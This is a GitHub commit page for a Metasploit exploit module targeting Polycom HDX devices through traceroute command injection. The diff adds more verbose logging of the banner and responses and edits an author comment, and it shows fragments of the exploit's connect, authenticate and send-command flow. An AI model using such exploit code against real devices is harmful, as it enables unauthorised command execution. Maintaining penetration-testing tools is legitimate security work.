Skip to content

Commit 829a7a5

Browse files
author
Austin
authored
verbose response.
1 parent 4918e58 commit 829a7a5

File tree

1 file changed

+6
-3
lines changed

1 file changed

+6
-3
lines changed

modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb

Lines changed: 6 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -17,7 +17,7 @@ def initialize(info = {})
1717
attacker to execute arbitrary payloads with telnet or openssl.
1818
},
1919
'Author' => [
20-
'Mumbai', # https://github.com/realoriginal (module)
20+
'Mumbai', #
2121
'staaldraad', # https://twitter.com/_staaldraad/
2222
'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # took some of the code from polycom_hdx_auth_bypass
2323
'h00die <[email protected]>' # stole the code, creds to them
@@ -73,7 +73,8 @@ def exploit
7373
sock = connect
7474
Rex.sleep(2)
7575
banner = sock.get_once
76-
vprint_status("Received : #{banner}")
76+
vprint_status("Recieved #{banner.length} bytes from service")
77+
vprint_line("#{banner}")
7778
if banner =~ /password/
7879
print_status("Authentication enabled on device, authenticating with target...")
7980
if datastore['PASSWORD'].nil?
@@ -109,7 +110,9 @@ def do_payload(sock)
109110
sock.put(cmd)
110111
if datastore['VERBOSE']
111112
Rex.sleep(2)
112-
vprint_status(sock.get_once)
113+
resp = sock.get_once
114+
vprint_status("Recieved #{resp.length} bytes in response")
115+
vprint_line(resp)
113116
end
114117

115118
# Give time for our command to be queued and executed

0 commit comments

Comments
 (0)